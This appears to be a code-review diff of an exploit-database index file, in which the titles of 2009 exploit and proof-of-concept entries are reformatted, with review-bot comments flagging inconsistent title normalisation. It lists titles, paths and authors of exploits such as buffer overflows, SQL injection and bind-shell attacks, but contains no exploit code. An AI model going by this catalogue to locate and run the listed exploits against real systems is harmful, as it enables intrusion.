 8249,platforms/windows/local/8249.php,"BS.Player <= 2.34 Build 980 (.bsl) Local Buffer Overflow Exploit (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0
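Review bot: The new 8233 line keeps the lowercase `Local Stack overflow Exploit` while the same commit capitalises the word on 7652 (hunk @@ -7186, `Local Buffer Overflow PoC`), so the normalisation is applied unevenly within one pass. Since 8233 is being rewritten anyway, it should read `+8233,platforms/windows/local/8233.py,"Chasys Media Player 1.1 - (.pls) Local Stack Overflow Exploit",2009-03-18,His0k4,windows,local,0`.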
@@ -7789,12 +7789,12 @@ id,file,description,date,author,platform,type,port
 8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 Auth Bypass (SQL) / Upload Shell Vulnerabilities",2009-03-23,Mr.Skonnie,php,webapps,0
 8278,platforms/php/webapps/8278.txt,"Jinzora Media Jukebox <= 2.8 (name) Local File Inclusion Vulnerability",2009-03-24,dun,php,webapps,0
 8279,platforms/php/webapps/8279.txt,"PHPizabi 0.848b - C1 HFP1 Remote Privilege Escalation Vulnerability",2009-03-24,Nine:Situations:Group,php,webapps,0
-8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader JBIG2 Universal Exploit Bind Shell port 5500",2009-03-24,"Black Security",windows,local,0
+8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)",2009-03-24,"Black Security",windows,local,0
 8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus EMF GpFont.SetData Integer Overflow PoC",2009-03-24,"Black Security",windows,dos,0
 8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 (view.php id) SQL Injection Vulnerability",2009-03-24,x0r,php,webapps,0
 8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x Multiple Vulnerabilities (post auth)",2009-03-24,"Jonathan Salwan",windows,remote,0
 8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 (XSS) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0
-8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL Parsing Remote Memory Corruption PoC 0day",2009-03-25,"Guido Landi",multiple,dos,0
+8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (0day)",2009-03-25,"Guido Landi",multiple,dos,0
 8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Arbitrary File Upload Exploit",2009-03-25,EgiX,php,webapps,0
 8288,platforms/php/webapps/8288.txt,"WeBid 0.7.3 RC9 (upldgallery.php) Remote File Upload Vulnerability",2009-03-25,"Ahmad Pay",php,webapps,0
 8289,platforms/php/webapps/8289.pl,"PhotoStand 1.2.0 - Remote Command Execution Exploit",2009-03-26,Osirys,php,webapps,0
@@ -7864,7 +7864,7 @@ id,file,description,date,author,platform,type,port
 8353,platforms/php/webapps/8353.txt,"Joomla Component com_bookjoomlas 0.1 - SQL Injection Vulnerability",2009-04-06,"Salvatore Fresta",php,webapps,0
 8354,platforms/windows/remote/8354.py,"XBMC 8.10 GET Request Remote Buffer Overflow Exploit (SEH) (univ)",2009-04-06,n00b,windows,remote,80
 8355,platforms/php/webapps/8355.txt,"FlexCMS Calendar (ItemId) Blind SQL Injection Vulnerability",2009-04-06,Lanti-Net,php,webapps,0
-8356,platforms/windows/dos/8356.txt,"Mozilla Firefox XSL Parsing Remote Memory Corruption PoC #2",2009-04-06,DATA_SNIPER,windows,dos,0
+8356,platforms/windows/dos/8356.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (2)",2009-04-06,DATA_SNIPER,windows,dos,0
 8357,platforms/php/webapps/8357.py,"iDB 0.2.5pa SVN 243 (skin) Local File Inclusion Exploit",2009-04-06,LOTFREE,php,webapps,0
 8358,platforms/windows/dos/8358.pl,"UltraISO <= 9.3.3.2685 .ui Off By One / Buffer Overflow PoC",2009-04-06,Stack,windows,dos,0
 8359,platforms/hardware/remote/8359.py,"Pirelli Discus DRG A225 wifi router WPA2PSK Default Algorithm Exploit",2009-04-06,j0rgan,hardware,remote,0
@@ -7926,8 +7926,8 @@ id,file,description,date,author,platform,type,port
 8418,platforms/php/webapps/8418.pl,"ASP Product Catalog 1.0 (XSS/DD) Multiple Remote Exploits",2009-04-13,AlpHaNiX,php,webapps,0
 8419,platforms/windows/remote/8419.pl,"ftpdmin 0.96 Arbitrary File Disclosure Exploit",2009-04-13,Stack,windows,remote,21
 8420,platforms/windows/local/8420.py,"BulletProof FTP Client 2009 (.bps) Buffer Overflow Exploit (SEH)",2009-04-13,His0k4,windows,local,0
-8421,platforms/windows/remote/8421.py,"Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]",2009-04-13,His0k4,windows,remote,8000
-8422,platforms/windows/remote/8422.py,"Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]",2009-04-13,His0k4,windows,remote,8000
+8421,platforms/windows/remote/8421.py,"Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) (1)",2009-04-13,His0k4,windows,remote,8000
+8422,platforms/windows/remote/8422.py,"Steamcast - (HTTP Request) Remote Buffer Overflow Exploit (SEH) (2)",2009-04-13,His0k4,windows,remote,8000
 8423,platforms/php/webapps/8423.txt,"Jamroom (index.php t) Local File Inclusion Vulnerability",2009-04-14,zxvf,php,webapps,0
 8424,platforms/php/webapps/8424.txt,"ablespace 1.0 (xss/bsql) Multiple Vulnerabilities",2009-04-14,DSecRG,php,webapps,0
 8425,platforms/php/webapps/8425.txt,"php-revista 1.1.2 (rfi/sqli/cb/xss) Multiple Vulnerabilities",2009-04-14,SirDarckCat,php,webapps,0
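Review bot: The two new Steamcast lines come out formatted differently: 8421 keeps `Steamcast (HTTP Request) ...` with no ` - ` separator, while 8422 gets `Steamcast - (HTTP Request) ...`, so two entries for the same product and advisory will no longer group together on a title sort. 8421 should read `+8421,platforms/windows/remote/8421.py,"Steamcast - (HTTP Request) Remote Buffer Overflow Exploit (SEH) (1)",2009-04-13,His0k4,windows,remote,8000`.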
@@ -7994,7 +7994,7 @@ id,file,description,date,author,platform,type,port
 8486,platforms/php/webapps/8486.txt,"webClassifieds 2005 (Auth Bypass) Insecure Cookie Handling Vuln",2009-04-20,"ThE g0bL!N",php,webapps,0
 8487,platforms/php/webapps/8487.txt,"EZ Webitor (Auth Bypass) SQL Injection Vulnerability",2009-04-20,snakespc,php,webapps,0
 8488,platforms/php/webapps/8488.pl,"Pligg 9.9.0 (editlink.php id) Blind SQL Injection Exploit",2009-04-20,"Rohit Bansal",php,webapps,0
-8489,platforms/windows/dos/8489.pl,"CoolPlayer Portable 2.19.1 (.m3u File) Local Stack Overflow PoC",2009-04-20,GoLd_M,windows,dos,0
+8489,platforms/windows/dos/8489.pl,"CoolPlayer Portable 2.19.1 - (.m3u File) Local Stack Overflow PoC",2009-04-20,GoLd_M,windows,dos,0
 8490,platforms/hardware/dos/8490.sh,"Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)",2009-04-20,h00die,hardware,dos,0
 8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b (Insecure Cookie Handling) Blind SQL Injection Exploit",2009-04-20,YEnH4ckEr,php,webapps,0
 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 Insecure Cookie Handling Vulnerability",2009-04-20,"ThE g0bL!N",php,webapps,0
@@ -8024,15 +8024,15 @@ id,file,description,date,author,platform,type,port
 8516,platforms/php/webapps/8516.txt,"WebPortal CMS 0.8b Multiple Remote/Local File Inclusion Vulnerabilities",2009-04-22,ahmadbady,php,webapps,0
 8517,platforms/php/webapps/8517.txt,"Joomla Component rsmonials Remote Cross Site Scripting Exploit",2009-04-22,jdc,php,webapps,0
 8518,platforms/windows/remote/8518.pl,"Femitter FTP Server 1.03 Arbitrary File Disclosure Exploit",2009-04-22,Stack,windows,remote,0
-8519,platforms/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 (m3u) Buffer Overflow Exploit",2009-04-22,Stack,windows,local,0
-8520,platforms/windows/local/8520.py,"CoolPlayer Portable 2.19.1 (m3u) Buffer Overflow Exploit #2",2009-04-22,His0k4,windows,local,0
+8519,platforms/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit",2009-04-22,Stack,windows,local,0
+8520,platforms/windows/local/8520.py,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit (2)",2009-04-22,His0k4,windows,local,0
 8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 (ab/lfi/su) Multiple Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0
 8522,platforms/windows/dos/8522.pl,"Zervit HTTP Server <= 0.3 (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0
 8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard Remote DoS PoC",2009-04-23,shinnai,windows,dos,0
 8524,platforms/windows/dos/8524.txt,"Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0
 8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit",2009-04-23,Cyber-Zone,windows,remote,0
 8526,platforms/windows/dos/8526.py,"Popcorn 1.87 Remote Heap Overflow Exploit PoC",2009-04-23,x.CJP.x,windows,dos,0
-8527,platforms/windows/local/8527.py,"CoolPlayer Portable 2.19.1 (Skin) Buffer Overflow Exploit",2009-04-23,Stack,windows,local,0
+8527,platforms/windows/local/8527.py,"CoolPlayer Portable 2.19.1 - (Skin) Buffer Overflow Exploit",2009-04-23,Stack,windows,local,0
 8528,platforms/asp/webapps/8528.txt,"Absolute Form Processor XE-V 1.5 (auth Bypass) SQL Injection Vuln",2009-04-24,"ThE g0bL!N",asp,webapps,0
 8529,platforms/asp/webapps/8529.txt,"Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln",2009-04-24,ZoRLu,asp,webapps,0
 8530,platforms/asp/webapps/8530.htm,"Absolute Form Processor XE-V 1.5 - Remote Change Pasword Exploit",2009-04-24,"ThE g0bL!N",asp,webapps,0
@@ -8040,12 +8040,12 @@ id,file,description,date,author,platform,type,port
 8532,platforms/php/webapps/8532.txt,"photo-rigma.biz 30 - (sql/xss) Multiple Vulnerabilities",2009-04-24,YEnH4ckEr,php,webapps,0
 8533,platforms/php/webapps/8533.txt,"Pragyan CMS 2.6.4 - Multiple SQL Injection Vulnerabilities",2009-04-24,"Salvatore Fresta",php,webapps,0
 8534,platforms/linux/local/8534.c,"libvirt_proxy <= 0.5.1 - Local Privilege Escalation Exploit",2009-04-27,"Jon Oberheide",linux,local,0
-8535,platforms/windows/local/8535.pl,"Destiny Media Player 1.61 (.rdl) Local Buffer Overflow Exploit",2009-04-27,G4N0K,windows,local,0
-8536,platforms/windows/local/8536.py,"SDP Downloader 2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH)",2009-04-27,His0k4,windows,local,0
+8535,platforms/windows/local/8535.pl,"Destiny Media Player 1.61 - (.rdl) Local Buffer Overflow Exploit",2009-04-27,G4N0K,windows,local,0
+8536,platforms/windows/local/8536.py,"SDP Downloader 2.3.0 - (.ASX) Local Buffer Overflow Exploit (SEH)",2009-04-27,His0k4,windows,local,0
 8537,platforms/windows/remote/8537.txt,"dwebpro 6.8.26 (dt/fd) Multiple Vulnerabilities",2009-04-27,"Alfons Luja",windows,remote,0
 8538,platforms/php/webapps/8538.txt,"Invision Power Board 3.0.0b5 Active XSS & Path Disclosure Vulns",2009-04-27,brain[pillow],php,webapps,0
 8539,platforms/php/webapps/8539.txt,"Opencart 1.1.8 (route) Local File Inclusion Vulnerability",2009-04-27,OoN_Boy,php,webapps,0
-8540,platforms/windows/local/8540.c,"SDP Downloader 2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH) #2",2009-04-27,SimO-s0fT,windows,local,0
+8540,platforms/windows/local/8540.c,"SDP Downloader 2.3.0 - (.ASX) Local Buffer Overflow Exploit (SEH) (2)",2009-04-27,SimO-s0fT,windows,local,0
 8541,platforms/windows/local/8541.php,"Zoom Player Pro 3.30 (.m3u) - File Buffer Overflow Exploit (seh)",2009-04-27,Nine:Situations:Group,windows,local,0
 8542,platforms/windows/dos/8542.php,"Icewarp Merak Mail Server 9.4.1 Base64FileEncode() BOF PoC",2009-04-27,Nine:Situations:Group,windows,dos,0
 8543,platforms/php/webapps/8543.php,"LightBlog <= 9.9.2 (register.php) Remote Code Execution Exploit",2009-04-27,EgiX,php,webapps,0
@@ -8091,11 +8091,11 @@ id,file,description,date,author,platform,type,port
 8585,platforms/php/webapps/8585.txt,"Golabi CMS <= 1.0.1 Session Poisoning Vulnerability",2009-05-01,CrazyAngel,php,webapps,0
 8586,platforms/php/webapps/8586.txt,"MiniTwitter 0.2b Multiple SQL Injection Vulnerabilities",2009-05-01,YEnH4ckEr,php,webapps,0
 8587,platforms/php/webapps/8587.htm,"MiniTwitter 0.2b Remote User Options Changer Exploit",2009-05-01,YEnH4ckEr,php,webapps,0
-8588,platforms/windows/dos/8588.pl,"Beatport Player 1.0.0.283 (.M3U File) Local Buffer Overflow PoC",2009-05-01,SirGod,windows,dos,0
+8588,platforms/windows/dos/8588.pl,"Beatport Player 1.0.0.283 - (.M3U File) Local Buffer Overflow PoC",2009-05-01,SirGod,windows,dos,0
 8589,platforms/windows/local/8589.py,"RM Downloader (.smi File) Local Stack Overflow Exploit",2009-05-01,"ThE g0bL!N",windows,local,0
-8590,platforms/windows/local/8590.py,"Beatport Player 1.0.0.283 (.m3u) Local SEH Overwrite Exploit",2009-05-01,His0k4,windows,local,0
-8591,platforms/windows/local/8591.py,"Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit #2",2009-05-01,"Encrypt3d.M!nd ",windows,local,0
-8592,platforms/windows/local/8592.pl,"Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit #3",2009-05-01,Stack,windows,local,0
+8590,platforms/windows/local/8590.py,"Beatport Player 1.0.0.283 - (.m3u) Local SEH Overwrite Exploit",2009-05-01,His0k4,windows,local,0
+8591,platforms/windows/local/8591.py,"Beatport Player 1.0.0.283 - (.M3U File) Local Stack Overflow Exploit (2)",2009-05-01,"Encrypt3d.M!nd ",windows,local,0
+8592,platforms/windows/local/8592.pl,"Beatport Player 1.0.0.283 - (.M3U File) Local Stack Overflow Exploit (3)",2009-05-01,Stack,windows,local,0
 8593,platforms/php/webapps/8593.txt,"pecio cms 1.1.5 (index.php language) Local File Inclusion Vulnerability",2009-05-01,SirGod,php,webapps,0
 8594,platforms/windows/local/8594.pl,"RM Downloader (.smi File) Universal Local Buffer Overflow Exploit",2009-05-01,Stack,windows,local,0
 8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 – 9.0 getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0
@@ -8464,7 +8464,7 @@ id,file,description,date,author,platform,type,port
 8971,platforms/windows/dos/8971.pl,"Carom3D 5.06 Unicode Buffer Overrun/DoS Vulnerability",2009-06-16,LiquidWorm,windows,dos,0
 8974,platforms/php/webapps/8974.txt,"XOOPS <= 2.3.3 - Remote File Disclosure Vulnerability (.htaccess)",2009-06-16,daath,php,webapps,0
 8975,platforms/php/webapps/8975.txt,"phpFK 7.03 (page_bottom.php) Local File Inclusion Vulnerability",2009-06-17,ahmadbady,php,webapps,0
-8976,platforms/multiple/dos/8976.pl,"Multiple HTTP Server Low Bandwidth Denial of Service (slowloris.pl)",2009-06-17,RSnake,multiple,dos,0
+8976,platforms/multiple/dos/8976.pl,"Multiple HTTP Server - Low Bandwidth Denial of Service (slowloris.pl)",2009-06-17,RSnake,multiple,dos,0
 8977,platforms/php/webapps/8977.txt,"TekBase All-in-One 3.1 - Multiple SQL Injection Vulnerabilities",2009-06-17,n3wb0ss,php,webapps,0
 8978,platforms/php/webapps/8978.txt,"fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC",2009-06-17,StAkeR,php,webapps,0
 8979,platforms/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusion Vulnerabilities",2009-06-17,YEnH4ckEr,php,webapps,0
@@ -8477,7 +8477,7 @@ id,file,description,date,author,platform,type,port
 8987,platforms/cgi/webapps/8987.txt,"MIDAS 1.43 (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-06-22,HxH,cgi,webapps,0
 8988,platforms/php/webapps/8988.txt,"pc4 Uploader <= 10.0 - Remote File Disclosure Vulnerability",2009-06-22,Qabandi,php,webapps,0
 8990,platforms/php/webapps/8990.txt,"phpDatingClub 3.7 - Remote SQL/XSS Injection Vulnerabilities",2009-06-22,"ThE g0bL!N",php,webapps,0
-8991,platforms/multiple/dos/8991.php,"Multiple HTTP Server Low Bandwidth Denial of Service #2",2009-06-22,evilrabbi,multiple,dos,0
+8991,platforms/multiple/dos/8991.php,"Multiple HTTP Server - Low Bandwidth Denial of Service (2)",2009-06-22,evilrabbi,multiple,dos,0
 8992,platforms/php/webapps/8992.php,"pmaPWN! - phpMyAdmin Code Injection RCE Scanner & Exploit",2009-06-22,"Hacking Expose!",php,webapps,0
 8993,platforms/php/webapps/8993.txt,"elgg (xss/csrf/change password) Multiple Vulnerabilities",2009-06-22,lorddemon,php,webapps,0
 8994,platforms/php/webapps/8994.txt,"AWScripts Gallery Search Engine 1.x Insecure Cookie Vulnerability",2009-06-22,TiGeR-Dz,php,webapps,0
@@ -8696,7 +8696,7 @@ id,file,description,date,author,platform,type,port
 9217,platforms/php/webapps/9217.txt,"E-Xoopport 3.1 Module MyAnnonces (lid) SQL Injection Vulnerability",2009-07-20,Vrs-hCk,php,webapps,0
 9219,platforms/php/webapps/9219.txt,"powerUpload 2.4 (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-07-20,InjEctOr5,php,webapps,0
 9220,platforms/windows/dos/9220.pl,"KMplayer <= 2.9.4.1433 (.srt File) Local Buffer Overflow PoC",2009-07-20,b3hz4d,windows,dos,0
-9221,platforms/windows/local/9221.pl,"WINMOD 1.4 (.lst File) Local Buffer Overflow Exploit (SEH)",2009-07-21,hack4love,windows,local,0
+9221,platforms/windows/local/9221.pl,"WINMOD 1.4 - (.lst) Local Buffer Overflow Exploit (SEH)",2009-07-21,hack4love,windows,local,0
 9222,platforms/windows/dos/9222.cpp,"FlyHelp (.CHM File) Local Buffer Overflow PoC",2009-07-21,"fl0 fl0w",windows,dos,0
 9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit",2009-07-21,"Jeremy Brown",windows,local,0
 9224,platforms/windows/remote/9224.py,"MS Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0
@@ -8704,9 +8704,9 @@ id,file,description,date,author,platform,type,port
 9226,platforms/php/webapps/9226.txt,"phpdirectorysource (xss/sql) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0
 9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script (url) Local File Disclosure Vulnerability",2009-07-21,Moudi,php,webapps,0
 9228,platforms/windows/dos/9228.pl,"otsAV 1.77.001 (.ofl File) Local Heap Overflow PoC",2009-07-22,hack4love,windows,dos,0
-9229,platforms/windows/local/9229.py,"WINMOD 1.4 (.lst) Universal Buffer Overflow Exploit (SEH) #2",2009-07-22,Dz_Girl,windows,local,0
+9229,platforms/windows/local/9229.py,"WINMOD 1.4 - (.lst) Universal Buffer Overflow Exploit (SEH) (2)",2009-07-22,Dz_Girl,windows,local,0
 9231,platforms/php/webapps/9231.txt,"Phorum <= 5.2.11 Permanent Cross Site Scripting Vulnerabilities",2009-07-22,Crashfr,php,webapps,0
-9234,platforms/windows/local/9234.pl,"WINMOD 1.4 (.lst) Local Stack Overflow Exploit",2009-07-23,"CWH Underground",windows,local,0
+9234,platforms/windows/local/9234.pl,"WINMOD 1.4 - (.lst) Local Stack Overflow Exploit",2009-07-23,"CWH Underground",windows,local,0
 9235,platforms/php/webapps/9235.php,"e107 Plugin my_gallery 2.4.1 readfile() Local File Disclosure Exploit",2009-07-23,NoGe,php,webapps,0
 9236,platforms/php/webapps/9236.txt,"GLinks 2.1 (cat) Remote Blind SQL Injection Vulnerability",2009-07-23,"599eme Man",php,webapps,0
 9237,platforms/php/webapps/9237.txt,"AWCM 2.1 - Local File Inclusion / Auth Bypass Vulnerabilities",2009-07-23,SwEET-DeViL,php,webapps,0
@@ -8770,7 +8770,7 @@ id,file,description,date,author,platform,type,port
 9296,platforms/php/webapps/9296.txt,"TinyBrowser (TinyMCE Editor File browser) 1.41.6 - Multiple Vulnerabilities",2009-07-28,"Aung Khant",php,webapps,0
 9297,platforms/php/webapps/9297.txt,"ultrize timesheet 1.2.2 - Remote File Inclusion Vulnerability",2009-07-28,NoGe,php,webapps,0
 9298,platforms/windows/local/9298.pl,"Millenium MP3 Studio 1.0 .mpf File Local Stack Overflow Exploit (update)",2009-07-30,corelanc0d3r,windows,local,0
-9299,platforms/windows/local/9299.pl,"WINMOD 1.4 (.lst) Local Stack Overflow Exploit XP SP3 (RET+SEH) #3",2009-07-28,corelanc0d3r,windows,local,0
+9299,platforms/windows/local/9299.pl,"WINMOD 1.4 - (.lst) Local Stack Overflow Exploit XP SP3 (RET+SEH) (3)",2009-07-28,corelanc0d3r,windows,local,0
 9300,platforms/multiple/dos/9300.c,"ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC",2009-07-30,kingcope,multiple,dos,0
 9301,platforms/windows/local/9301.txt,"Microsoft Windows XP (win32k.sys) Local Privilege Escalation Exploit",2009-07-30,"NT Internals",windows,local,0
 9302,platforms/linux/local/9302.py,"Compface 1.1.5 (.xbm File) Local Buffer Overflow Exploit",2009-07-30,His0k4,linux,local,0
@@ -8792,7 +8792,7 @@ id,file,description,date,author,platform,type,port
 9318,platforms/windows/remote/9318.py,"VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit (univ)",2009-07-31,His0k4,windows,remote,0
 9319,platforms/windows/remote/9319.py,"SAP Business One 2005-A License Manager Remote BOF Exploit",2009-08-01,Bruk0ut,windows,remote,30000
 9320,platforms/php/webapps/9320.php,"Arab Portal 2.x - (forum.php qc) Remote SQL Injection Exploit",2009-08-01,rEcruit,php,webapps,0
-9321,platforms/windows/local/9321.pl,"Destiny Media Player 1.61 (.pls) Universal Buffer Overflow Exploit (SEH)",2009-08-01,"ThE g0bL!N",windows,local,0
+9321,platforms/windows/local/9321.pl,"Destiny Media Player 1.61 - (.pls) Universal Buffer Overflow Exploit (SEH)",2009-08-01,"ThE g0bL!N",windows,local,0
 9322,platforms/php/webapps/9322.txt,"MAXcms 3.11.20b Multiple Remote File Inclusion Vulnerabilities",2009-08-01,NoGe,php,webapps,0
 9323,platforms/multiple/dos/9323.txt,"VirtualBox 2.2 - 3.0.2 r49928 Local Host Reboot PoC",2009-08-01,"Tadas Vilkeliskis",multiple,dos,0
 9324,platforms/php/webapps/9324.txt,"Joomla Component com_jfusion (Itemid) Blind SQL Injection Vuln",2009-08-01,"Chip d3 bi0s",php,webapps,0
@@ -8878,15 +8878,15 @@ id,file,description,date,author,platform,type,port
 9409,platforms/windows/local/9409.pl,"MediaCoder 0.7.1.4490 (.lst/.m3u) Universal BOF Exploit (SEH)",2009-08-10,hack4love,windows,local,0
 9410,platforms/php/webapps/9410.txt,"Wordpress <= 2.8.3 - Remote Admin Reset Password Vulnerability",2009-08-11,"laurent gaffié ",php,webapps,0
 9411,platforms/windows/dos/9411.cpp,"Embedthis Appweb 3.0b.2-4 Remote Buffer Overflow PoC",2009-08-11,"fl0 fl0w",windows,dos,0
-9412,platforms/windows/local/9412.pl,"Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)",2009-08-11,ahwak2000,windows,local,0
+9412,platforms/windows/local/9412.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH)",2009-08-11,ahwak2000,windows,local,0
 9413,platforms/php/webapps/9413.txt,"Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln",2009-08-11,kkr,php,webapps,0
 9416,platforms/php/webapps/9416.txt,"OCS Inventory NG 1.2.1 (systemid) SQL Injection Vulnerability",2009-08-11,"Guilherme Marinheiro",php,webapps,0
 9417,platforms/windows/dos/9417.txt,"MS Windows 2003 (EOT File) BSOD Crash Exploit",2009-08-11,webDEViL,windows,dos,0
-9418,platforms/windows/local/9418.pl,"Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH) #2",2009-08-11,"ThE g0bL!N",windows,local,0
+9418,platforms/windows/local/9418.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (2)",2009-08-11,"ThE g0bL!N",windows,local,0
 9419,platforms/php/webapps/9419.txt,"Shorty 0.7.1b (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-08-12,"Pedro Laguna",php,webapps,0
-9420,platforms/windows/local/9420.pl,"Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)",2009-08-12,hack4love,windows,local,0
+9420,platforms/windows/local/9420.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (3)",2009-08-12,hack4love,windows,local,0
 9421,platforms/php/webapps/9421.txt,"Gallarific 1.1 (gallery.php) 
Arbitrary Delete/Edit Category Vuln",2009-08-12,"ilker Kandemir",php,webapps,0
-9422,platforms/hardware/remote/9422.txt,"2WIRE Gateway Authentication Bypass & Password Reset Vulnerabilities",2009-08-12,hkm,hardware,remote,0
+9422,platforms/hardware/remote/9422.txt,"2WIRE Gateway - Authentication Bypass & Password Reset Vulnerabilities",2009-08-12,hkm,hardware,remote,0
 9423,platforms/windows/dos/9423.pl,"MS Wordpad on winXP SP3 Local Crash Exploit",2009-08-12,murderkey,windows,dos,0
 9424,platforms/php/webapps/9424.txt,"Plume CMS 1.2.3 - Multiple SQL Injection Vulnerabilities",2009-08-12,"Sense of Security",php,webapps,0
 9425,platforms/php/webapps/9425.sh,"Gazelle CMS 1.0 - Multiple Vulnerabilities / RCE Exploit",2009-08-12,IHTeam,php,webapps,0
@@ -8910,7 +8910,7 @@ id,file,description,date,author,platform,type,port
 9444,platforms/php/webapps/9444.txt,"PHP-Lance 1.52 Multiple Local File Inclusion Vulnerabilities",2009-08-18,jetli007,php,webapps,0
 9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection Exploit",2009-08-18,IRCRASH,php,webapps,0
 9446,platforms/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH)",2009-08-18,"fl0 fl0w",windows,dos,0
-9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x (store.php id) SQL Injection Exploit",2009-08-18,NoGe,php,webapps,0
+9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - (store.php id) SQL Injection Exploit",2009-08-18,NoGe,php,webapps,0
 9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0
 9449,platforms/windows/dos/9449.txt,"TheGreenBow VPN Client tgbvpn.sys Local DoS Exploit",2009-08-18,Evilcry,windows,dos,0
 9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 (RCE/CSRF/LFI/XSS) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0
@@ -8922,7 +8922,7 @@ id,file,description,date,author,platform,type,port
 9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem Arbitrary Add Admin User Vulnerability",2009-08-18,SuNHouSe2,hardware,remote,0
 9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a (.mp3 File) Local Buffer Overflow PoC",2009-08-18,hack4love,windows,dos,0
 9458,platforms/windows/local/9458.pl,"Xenorate Media Player 2.6.0.0 (.xpl) Universal Local Buffer Exploit (SEH)",2009-08-18,hack4love,windows,local,0
-9459,platforms/php/webapps/9459.txt,"2WIRE Gateway (Auth Bypass & Password Reset) Vulnerabilities #2",2009-08-18,bugz,php,webapps,0
+9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Auth Bypass & Password Reset Vulnerabilities (2)",2009-08-18,bugz,php,webapps,0
 9460,platforms/php/webapps/9460.txt,"autonomous lan party <= 0.98.3 - Remote File Inclusion Vulnerability",2009-08-18,"cr4wl3r ",php,webapps,0
 9461,platforms/php/webapps/9461.txt,"E Cms <= 1.0 (index.php s) Remote SQL Injection Vulnerability",2009-08-18,Red-D3v1L,php,webapps,0
 9462,platforms/php/webapps/9462.txt,"Infinity <= 2.x.x options[style_dir] Local File Disclosure Vulnerability",2009-08-18,SwEET-DeViL,php,webapps,0
@@ -9079,7 +9079,7 @@ id,file,description,date,author,platform,type,port
 9618,platforms/windows/local/9618.php,"Millenium MP3 Studio (pls/mpf/m3u) Local Universal BOF Exploits (SEH)",2009-09-09,hack4love,windows,local,0
 9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus vx(asx/wax/wvx) Universal Local BOF (SEH)",2009-09-09,hack4love,windows,local,0
 9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 (.mid) Integer Overflow PoC",2009-09-09,PLATEN,windows,dos,0
-9621,platforms/windows/dos/9621.txt,"Kolibri+ Webserver 2 (Get Request) Denial of Service Vulnerability",2009-09-10,"Usman Saeed",windows,dos,0
+9621,platforms/windows/dos/9621.txt,"Kolibri+ Webserver 2 - (Get Request) Denial of Service Vulnerability",2009-09-10,"Usman Saeed",windows,dos,0
